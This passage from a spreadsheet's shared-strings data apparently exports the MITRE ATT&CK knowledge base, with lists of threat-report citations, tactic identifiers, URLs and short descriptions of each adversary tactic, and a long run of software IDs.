FireEye Periscope March 2018),(Citation: FireEye FIN7 Aug 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Citizen Lab Group5),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ESET InvisiMole June 2020),(Citation: GitHub QuasarRAT),(Citation: Group IB Silence Sept 2018),(Citation: Talos Oblique RAT March 2021),(Citation: Kaspersky Transparent Tribe August 2020),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: F-Secure CozyDuke),(Citation: Cyble Egregor Oct 2020),(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015),(Citation: ESET Carberp March 2012),(Citation: Malwarebytes Agent Tesla April 2020),(Citation: Medium Metamorfo Apr 2020),(Citation: Proofpoint Bumblebee April 2022),(Citation: Kaspersky StoneDrill 2017),(Citation: Kaspersky Lyceum October 2021),(Citation: Talos Bisonal Mar 2020),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Unit42 Redaman January 2019),(Citation: ESET Operation Spalax Jan 2021),(Citation: Cybereason Bazar July 2020),(Citation: ESET Gelsemium June 2021),(Citation: Unit 42 Gamaredon February 2022),(Citation: NHS Digital Egregor Nov 2020),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: FireEye Hancitor),</t>
  </si>
  <si>
    <t>(Citation: Cybereason Kimsuky November 2020),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: ESET EvilNum July 2020),(Citation: ESET OceanLotus macOS April 2019),(Citation: Secureworks Karagany July 2019),(Citation: Check Point APT34 April 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: GitHub Pupy),(Citation: Unit 42 Lucifer June 2020),(Citation: NCCGroup RokRat Nov 2018),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Unit 42 OilRig Sept 2018),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Talos Smoke Loader July 2018),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: Trend Micro Qakbot May 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Securelist APT10 March 2021),(Citation: Talos Group123),(Citation: Talos GravityRAT),(Citation: Talos PoetRAT April 2020),(Citation: Malwarebytes Dyreza November 2015),(Citation: SentinelLabs reversing run-only applescripts 2021),(Citation: Kaspersky WIRTE November 2021),(Citation: ClearSky Lazarus Aug 2020),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: ESET Grandoreiro April 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Talos Remcos Aug 2018),(Citation: PaloAlto UBoatRAT Nov 2017),(Citation: Medium Eli Salem GuLoader April 2021),(Citation: Unit 42 WhisperGate January 2022),(Citation: Kaspersky Lab SynAck May 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Microsoft FinFisher March 2018),(Citation: Symantec Dyre June 2015),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Cyphort EvilBunny Dec 2014),(Citation: ClearSky Siamesekitten August 2021),(Citation: IBM MegaCortex),(Citation: NCC Group WastedLocker June 2020),(Citation: Unit 42 BadPatch Oct 2017),(Citation: ATT QakBot April 2021),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: ASERT Donot March 2018),(Citation: Unit42 PlugX June 2017),(Citation: ESET Okrum July 2019),(Citation: 20 macOS Common Tools and Techniques),(Citation: ESET InvisiMole June 2020),(Citation: ESET Attor Oct 2019),(Citation: Microsoft DUBNIUM June 2016),(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015),(Citation: Talos Oblique RAT March 2021),(Citation: Talos Frankenstein June 2019),</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Kaspersky Tomiris Sep 2021),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: ESET Dukes October 2019),(Citation: Cyberint Qakbot May 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: TrendMicro Ursnif File Dec 2014),(Citation: wardle evilquest parti),(Citation: Trustwave GoldenSpy June 2020),(Citation: Accenture MUDCARP March 2019),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Medium S2W WhisperGate January 2022),(Citation: Proofpoint Bumblebee April 2022),(Citation: CISA AppleJeus Feb 2021),(Citation: NCC Group Team9 June 2020),(Citation: Talos Bisonal Mar 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Securelist APT10 March 2021),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Joe Sec Trickbot),(Citation: trendmicro xcsset xcode project 2020),(Citation: JoeSecurity Egregor 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Medium Eli Salem GuLoader April 2021),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Cyphort EvilBunny Dec 2014),(Citation: Symantec RAINDROP January 2021),(Citation: Group IB GrimAgent July 2021),(Citation: ESET Okrum July 2019),(Citation: Unit42 Clop April 2021),(Citation: Unit42 BendyBear Feb 2021),(Citation: Kaspersky QakBot September 2021),(Citation: Malwarebytes Pony April 2016),(Citation: Talos Lokibot Jan 2021),</t>
  </si>
  <si>
    <t>(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015),(Citation: Unit42 Molerat Mar 2020),(Citation: FireEye FIN7 April 2017),(Citation: ESET Okrum July 2019),</t>
  </si>
  <si>
    <t>(Citation: Google EXOTIC LILY March 2022),(Citation: FireEye NETWIRE March 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Cisco Ukraine Wipers January 2022),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Cybereason Molerats Dec 2020),(Citation: Zdnet Ngrok September 2018),(Citation: Cisco Talos Intelligence Group),(Citation: Medium S2W WhisperGate January 2022),(Citation: FireEye Shining A Light on DARKSIDE May 2021),(Citation: Proofpoint Bumblebee April 2022),(Citation: Microsoft WhisperGate January 2022),(Citation: Aqua TeamTNT August 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: BleepingComputer Molerats Dec 2020),(Citation: Unit 42 Hildegard Malware),(Citation: ESET Operation Spalax Jan 2021),(Citation: Talos Rocke August 2018),(Citation: Cybereason Bazar July 2020),(Citation: FireEye FIN6 Apr 2019),(Citation: ESET Crutch December 2020),(Citation: Zscaler Bazar September 2020),(Citation: Symantec Inception Framework March 2018),(Citation: Medium Eli Salem GuLoader April 2021),(Citation: Unit 42 WhisperGate January 2022),(Citation: Bitdefender FIN8 July 2021),(Citation: Intezer Doki July 20),(Citation: Volexity Ocean Lotus November 2020),(Citation: Accenture HyperStack October 2020),(Citation: Anomali Rocke March 2019),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET Gamaredon June 2020),(Citation: ClearSky Pay2Kitten December 2020),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Crowdstrike WhisperGate January 2022),</t>
  </si>
  <si>
    <t>(Citation: F-Secure CozyDuke),(Citation: Google Election Threats October 2020),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: ESET Dukes October 2019),(Citation: ESET Turla PowerShell May 2019),(Citation: BitDefender Chafer May 2020),(Citation: ESET ComRAT May 2020),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: Checkpoint IndigoZebra July 2021),(Citation: F-Secure The Dukes),(Citation: Palo Alto Comnie),(Citation: PaloAlto Patchwork Mar 2018),(Citation: Talos ROKRAT),(Citation: ESET Turla Mosquito May 2018),(Citation: Unit 42 Nokki Oct 2018),(Citation: Mandiant APT1),(Citation: Talos Group123),(Citation: IBM Grandoreiro April 2020),(Citation: Anomali Static Kitten February 2021),(Citation: ESET Telebots Dec 2016),(Citation: Forcepoint Carbanak Google C2),(Citation: Talos Kimsuky Nov 2021),(Citation: Securelist ScarCruft May 2019),(Citation: Github PowerShell Empire),(Citation: ESET Grandoreiro April 2020),(Citation: Mandiant APT1 Appendix),(Citation: ESET Crutch December 2020),(Citation: PaloAlto UBoatRAT Nov 2017),(Citation: Lazarus APT January 2022),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: FireEye APT17),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: CISA ComRAT Oct 2020),(Citation: CyberESI GTALK),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Unit 42 Kazuar May 2017),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Microsoft POLONIUM June 2022),(Citation: FireEye admin@338),(Citation: Proofpoint Leviathan Oct 2017),(Citation: TrendMicro Patchwork Dec 2017),(Citation: ASERT Donot March 2018),(Citation: ESET Telebots June 2017),(Citation: Talent-Jump Clambling February 2020),(Citation: Meyers Numbered Panda),(Citation: FireEye Periscope March 2018),(Citation: ESET Turla Mosquito Jan 2018),(Citation: FireEye FIN7 Aug 2018),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: FireEye APT37 Feb 2018),(Citation: Forcepoint Monsoon),</t>
  </si>
  <si>
    <t>(Citation: ESET Dukes October 2019),(Citation: CheckPoint Redaman October 2019),(Citation: F-Secure The Dukes),(Citation: PaloAlto Patchwork Mar 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: Securelist MiniDuke Feb 2013),(Citation: FireEye APT41 Aug 2019),(Citation: Unit42 Redaman January 2019),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: FireEye APT17),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: ESET RTM Feb 2017),(Citation: TrendMicro Patchwork Dec 2017),(Citation: FireEye Periscope March 2018),(Citation: Anomali Rocke March 2019),(Citation: Securelist Dropping Elephant),(Citation: Unit42 Xbash Sept 2018),(Citation: Forcepoint Monsoon),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Palo Alto PlugX June 2017),</t>
  </si>
  <si>
    <t>(Citation: Medium Metamorfo Apr 2020),(Citation: FireEye Periscope March 2018),(Citation: F-Secure The Dukes),(Citation: Fortinet Metamorfo Feb 2020),(Citation: FireEye APT29),(Citation: FireEye Metamorfo Apr 2018),(Citation: Prevailion EvilNum May 2020),</t>
  </si>
  <si>
    <t>(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Dragos Crashoverride 2018),(Citation: Symantec Cicada November 2020),(Citation: Dragos EKANS),(Citation: Cybereason Molerats Dec 2020),(Citation: Talos Olympic Destroyer 2018),(Citation: Prevailion EvilNum May 2020),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: BlackBerry Bahamut),(Citation: Carbon Black Emotet Apr 2019),(Citation: Lazarus RATANKBA),(Citation: Unit42 Sofacy Dec 2018),(Citation: Talos GravityRAT),(Citation: TrendMicro EarthLusca 2022),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: RedCanary Mockingbird May 2020),(Citation: FireEye FiveHands April 2021),(Citation: PowerSploit Documentation),(Citation: RATANKBA),(Citation: Kaspersky QakBot September 2021),(Citation: CrowdStrike Grim Spider May 2019),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Symantec WastedLocker June 2020),(Citation: Google EXOTIC LILY March 2022),(Citation: Cycraft Chimera April 2020),(Citation: Securelist BlackEnergy Feb 2015),(Citation: jRAT Symantec Aug 2018),(Citation: US-CERT NotPetya 2017),(Citation: Mandiant No Easy Breach),(Citation: eSentire FIN7 July 2021),(Citation: ESET Hermetic Wizard March 2022),(Citation: Unit 42 OilRig Sept 2018),(Citation: Securelist Octopus Oct 2018),(Citation: DFIR Ryuk's Return October 2020),(Citation: Cybereason Soft Cell June 2019),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Github PowerShell Empire),(Citation: Cybereason Bazar July 2020),(Citation: Cybereason Bumblebee August 2022),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Github Koadic),(Citation: CME Github September 2018),(Citation: SecureWorks WannaCry Analysis),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: FoxIT Wocao December 2019),(Citation: Proofpoint TA505 Mar 2018),(Citation: SentinelOne Valak June 2020),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: FireEye MuddyWater Mar 2018),(Citation: DFIR Conti Bazar Nov 2021),(Citation: cobaltstrike manual),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Talos Frankenstein June 2019),(Citation: FireEye FIN7 April 2017),(Citation: Bromium Ursnif Mar 2017),(Citation: LogRhythm WannaCry),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: Qualys LolZarus),(Citation: Novetta Blockbuster RATs),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Unit 42 Lucifer June 2020),(Citation: TrendMicro Netwalker May 2020),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: FireEye APT32 May 2017),(Citation: Kaspersky StoneDrill 2017),(Citation: Check Point Meteor Aug 2021),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: BleepingComputer Molerats Dec 2020),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: ClearSky Lazarus Aug 2020),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye APT34 Dec 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Prevailion DarkWatchman 2021),(Citation: Bitdefender FIN8 July 2021),(Citation: Cyphort EvilBunny Dec 2014),(Citation: FireEye WannaCry 2017),(Citation: Unit 42 Kazuar May 2017),(Citation: CERT-EE Gamaredon January 2021),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Securelist MuddyWater Oct 2018),(Citation: ESET Turla Mosquito Jan 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Group IB APT 41 June 2021),(Citation: Talos Nyetya June 2017),(Citation: FireEye Obfuscation June 2017),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Bitdefender Naikon April 2021),(Citation: GitHub PoshC2),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: ESET GreyEnergy Oct 2018),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Microsoft 365 Defender Solorigate),(Citation: Novetta Blockbuster),(Citation: Github AD-Pentest-Script),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Talos Micropsia June 2017),(Citation: DustySky),(Citation: Juniper IcedID June 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Group IB Ransomware May 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Talos MuddyWater May 2019),(Citation: Impacket Tools),(Citation: Hornet Security Avaddon June 2020),(Citation: Sophos Maze VM September 2020),(Citation: Cofense Astaroth Sept 2018),(Citation: Securelist Remexi Jan 2019),(Citation: Radware Micropsia July 2018),(Citation: Group IB Ransomware September 2020),(Citation: GitHub PowerSploit May 2012),(Citation: Alperovitch 2014),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: McAfee Maze March 2020),(Citation: NCC Group Chimera January 2021),(Citation: FireEye WMI 2015),(Citation: win10_asr),(Citation: Microsoft WDAC)</t>
  </si>
  <si>
    <t>(Citation: PTSecurity Higaisa 2020),(Citation: Talos Cobalt Group July 2018),(Citation: Cybereason Astaroth Feb 2019),(Citation: ESET Lazarus Jun 2020),</t>
  </si>
  <si>
    <t>TA0009</t>
  </si>
  <si>
    <t>TA0011</t>
  </si>
  <si>
    <t>TA0006</t>
  </si>
  <si>
    <t>TA0005</t>
  </si>
  <si>
    <t>TA0007</t>
  </si>
  <si>
    <t>TA0002</t>
  </si>
  <si>
    <t>TA0010</t>
  </si>
  <si>
    <t>TA0040</t>
  </si>
  <si>
    <t>TA0001</t>
  </si>
  <si>
    <t>TA0008</t>
  </si>
  <si>
    <t>TA0003</t>
  </si>
  <si>
    <t>TA0004</t>
  </si>
  <si>
    <t>TA0043</t>
  </si>
  <si>
    <t>TA0042</t>
  </si>
  <si>
    <t>The adversary is trying to gather data of interest to their goal.
Collection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) the data. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.</t>
  </si>
  <si>
    <t>The adversary is trying to communicate with compromised systems to control them.
Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.</t>
  </si>
  <si>
    <t>The adversary is trying to steal account names and passwords.
Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.</t>
  </si>
  <si>
    <t xml:space="preserve">The adversary is trying to avoid being detected.
Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses. </t>
  </si>
  <si>
    <t xml:space="preserve">The adversary is trying to figure out your environment.
Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective. </t>
  </si>
  <si>
    <t xml:space="preserve">The adversary is trying to run malicious code.
Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery. </t>
  </si>
  <si>
    <t>The adversary is trying to steal data.
Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.</t>
  </si>
  <si>
    <t>The adversary is trying to manipulate, interrupt, or destroy your systems and data.
Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.</t>
  </si>
  <si>
    <t>The adversary is trying to get into your network.
Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.</t>
  </si>
  <si>
    <t xml:space="preserve">The adversary is trying to move through your environment.
Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. </t>
  </si>
  <si>
    <t xml:space="preserve">The adversary is trying to maintain their foothold.
Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. </t>
  </si>
  <si>
    <t xml:space="preserve">The adversary is trying to gain higher-level permissions.
Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: 
* SYSTEM/root level
* local administrator
* user account with admin-like access 
* user accounts with access to specific system or perform specific function
These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.  </t>
  </si>
  <si>
    <t>The adversary is trying to gather information they can use to plan future operations.
Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.</t>
  </si>
  <si>
    <t>The adversary is trying to establish resources they can use to support operations.
Resource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0040</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0043</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0042</t>
  </si>
  <si>
    <t>19 July 2019</t>
  </si>
  <si>
    <t>25 July 2019</t>
  </si>
  <si>
    <t>06 January 2021</t>
  </si>
  <si>
    <t>aliases</t>
  </si>
  <si>
    <t>type</t>
  </si>
  <si>
    <t>S0066</t>
  </si>
  <si>
    <t>S0065</t>
  </si>
  <si>
    <t>S0677</t>
  </si>
  <si>
    <t>S0469</t>
  </si>
  <si>
    <t>S0045</t>
  </si>
  <si>
    <t>S0073</t>
  </si>
  <si>
    <t>S1028</t>
  </si>
  <si>
    <t>S0552</t>
  </si>
  <si>
    <t>S0331</t>
  </si>
  <si>
    <t>S0092</t>
  </si>
  <si>
    <t>S1025</t>
  </si>
  <si>
    <t>S0504</t>
  </si>
  <si>
    <t>S0584</t>
  </si>
  <si>
    <t>S0622</t>
  </si>
  <si>
    <t>S0456</t>
  </si>
  <si>
    <t>S0099</t>
  </si>
  <si>
    <t>S0373</t>
  </si>
  <si>
    <t>S0438</t>
  </si>
  <si>
    <t>S1029</t>
  </si>
  <si>
    <t>S0347</t>
  </si>
  <si>
    <t>S0129</t>
  </si>
  <si>
    <t>S0640</t>
  </si>
  <si>
    <t>S0473</t>
  </si>
  <si>
    <t>S0344</t>
  </si>
  <si>
    <t>S0031</t>
  </si>
  <si>
    <t>S0245</t>
  </si>
  <si>
    <t>S0642</t>
  </si>
  <si>
    <t>S0128</t>
  </si>
  <si>
    <t>S0470</t>
  </si>
  <si>
    <t>S0127</t>
  </si>
  <si>
    <t>S0017</t>
  </si>
  <si>
    <t>S0190</t>
  </si>
  <si>
    <t>S0069</t>
  </si>
  <si>
    <t>S0520</t>
  </si>
  <si>
    <t>S0657</t>
  </si>
  <si>
    <t>S0360</t>
  </si>
  <si>
    <t>S0415</t>
  </si>
  <si>
    <t>S0114</t>
  </si>
  <si>
    <t>S0014</t>
  </si>
  <si>
    <t>S0043</t>
  </si>
  <si>
    <t>S0638</t>
  </si>
  <si>
    <t>S0414</t>
  </si>
  <si>
    <t>S0475</t>
  </si>
  <si>
    <t>S0093</t>
  </si>
  <si>
    <t>S0606</t>
  </si>
  <si>
    <t>S0337</t>
  </si>
  <si>
    <t>S0234</t>
  </si>
  <si>
    <t>S0239</t>
  </si>
  <si>
    <t>S0534</t>
  </si>
  <si>
    <t>S0574</t>
  </si>
  <si>
    <t>S0268</t>
  </si>
  <si>
    <t>S0570</t>
  </si>
  <si>
    <t>S0089</t>
  </si>
  <si>
    <t>S0564</t>
  </si>
  <si>
    <t>S0521</t>
  </si>
  <si>
    <t>S0486</t>
  </si>
  <si>
    <t>S0635</t>
  </si>
  <si>
    <t>S0651</t>
  </si>
  <si>
    <t>S0252</t>
  </si>
  <si>
    <t>S0204</t>
  </si>
  <si>
    <t>S1039</t>
  </si>
  <si>
    <t>S0482</t>
  </si>
  <si>
    <t>S0025</t>
  </si>
  <si>
    <t>S0465</t>
  </si>
  <si>
    <t>S0462</t>
  </si>
  <si>
    <t>S0222</t>
  </si>
  <si>
    <t>S0023</t>
  </si>
  <si>
    <t>S0212</t>
  </si>
  <si>
    <t>S0137</t>
  </si>
  <si>
    <t>S0527</t>
  </si>
  <si>
    <t>S0119</t>
  </si>
  <si>
    <t>S0693</t>
  </si>
  <si>
    <t>S0454</t>
  </si>
  <si>
    <t>S0274</t>
  </si>
  <si>
    <t>S0077</t>
  </si>
  <si>
    <t>S0351</t>
  </si>
  <si>
    <t>S0030</t>
  </si>
  <si>
    <t>S0484</t>
  </si>
  <si>
    <t>S0335</t>
  </si>
  <si>
    <t>S0348</t>
  </si>
  <si>
    <t>S0261</t>
  </si>
  <si>
    <t>S0572</t>
  </si>
  <si>
    <t>S0144</t>
  </si>
  <si>
    <t>S0631</t>
  </si>
  <si>
    <t>S0220</t>
  </si>
  <si>
    <t>S0674</t>
  </si>
  <si>
    <t>S0107</t>
  </si>
  <si>
    <t>S0020</t>
  </si>
  <si>
    <t>S1041</t>
  </si>
  <si>
    <t>S0667</t>
  </si>
  <si>
    <t>S0660</t>
  </si>
  <si>
    <t>S0611</t>
  </si>
  <si>
    <t>S0054</t>
  </si>
  <si>
    <t>S0154</t>
  </si>
  <si>
    <t>S0338</t>
  </si>
  <si>
    <t>S0369</t>
  </si>
  <si>
    <t>S0126</t>
  </si>
  <si>
    <t>S0244</t>
  </si>
  <si>
    <t>S0608</t>
  </si>
  <si>
    <t>S0591</t>
  </si>
  <si>
    <t>S0575</t>
  </si>
  <si>
    <t>S0492</t>
  </si>
  <si>
    <t>S0050</t>
  </si>
  <si>
    <t>S0614</t>
  </si>
  <si>
    <t>S0046</t>
  </si>
  <si>
    <t>S0488</t>
  </si>
  <si>
    <t>S1023</t>
  </si>
  <si>
    <t>S1024</t>
  </si>
  <si>
    <t>S0115</t>
  </si>
  <si>
    <t>S0235</t>
  </si>
  <si>
    <t>S0538</t>
  </si>
  <si>
    <t>S0498</t>
  </si>
  <si>
    <t>S0625</t>
  </si>
  <si>
    <t>S0687</t>
  </si>
  <si>
    <t>S1033</t>
  </si>
  <si>
    <t>S0255</t>
  </si>
  <si>
    <t>S0616</t>
  </si>
  <si>
    <t>S0213</t>
  </si>
  <si>
    <t>S0694</t>
  </si>
  <si>
    <t>S0497</t>
  </si>
  <si>
    <t>S1014</t>
  </si>
  <si>
    <t>S0334</t>
  </si>
  <si>
    <t>S0673</t>
  </si>
  <si>
    <t>S0187</t>
  </si>
  <si>
    <t>S0243</t>
  </si>
  <si>
    <t>S0354</t>
  </si>
  <si>
    <t>S0021</t>
  </si>
  <si>
    <t>S0659</t>
  </si>
  <si>
    <t>S0200</t>
  </si>
  <si>
    <t>S1021</t>
  </si>
  <si>
    <t>S0281</t>
  </si>
  <si>
    <t>S0600</t>
  </si>
  <si>
    <t>S0695</t>
  </si>
  <si>
    <t>S0186</t>
  </si>
  <si>
    <t>S0134</t>
  </si>
  <si>
    <t>S0384</t>
  </si>
  <si>
    <t>S0547</t>
  </si>
  <si>
    <t>S0502</t>
  </si>
  <si>
    <t>S0567</t>
  </si>
  <si>
    <t>S0038</t>
  </si>
  <si>
    <t>S0062</t>
  </si>
  <si>
    <t>S0024</t>
  </si>
  <si>
    <t>S0593</t>
  </si>
  <si>
    <t>S0605</t>
  </si>
  <si>
    <t>S0064</t>
  </si>
  <si>
    <t>S0568</t>
  </si>
  <si>
    <t>S0377</t>
  </si>
  <si>
    <t>S0624</t>
  </si>
  <si>
    <t>S0554</t>
  </si>
  <si>
    <t>S0081</t>
  </si>
  <si>
    <t>S0082</t>
  </si>
  <si>
    <t>S0367</t>
  </si>
  <si>
    <t>S0363</t>
  </si>
  <si>
    <t>S0634</t>
  </si>
  <si>
    <t>S0091</t>
  </si>
  <si>
    <t>S0396</t>
  </si>
  <si>
    <t>S0152</t>
  </si>
  <si>
    <t>S0401</t>
  </si>
  <si>
    <t>S0343</t>
  </si>
  <si>
    <t>S0361</t>
  </si>
  <si>
    <t>S0569</t>
  </si>
  <si>
    <t>S0181</t>
  </si>
  <si>
    <t>S0267</t>
  </si>
  <si>
    <t>S0618</t>
  </si>
  <si>
    <t>S0036</t>
  </si>
  <si>
    <t>S0173</t>
  </si>
  <si>
    <t>S0628</t>
  </si>
  <si>
    <t>S0076</t>
  </si>
  <si>
    <t>S0512</t>
  </si>
  <si>
    <t>S0171</t>
  </si>
  <si>
    <t>S0679</t>
  </si>
  <si>
    <t>S0120</t>
  </si>
  <si>
    <t>S0182</t>
  </si>
  <si>
    <t>S0355</t>
  </si>
  <si>
    <t>S0696</t>
  </si>
  <si>
    <t>S0143</t>
  </si>
  <si>
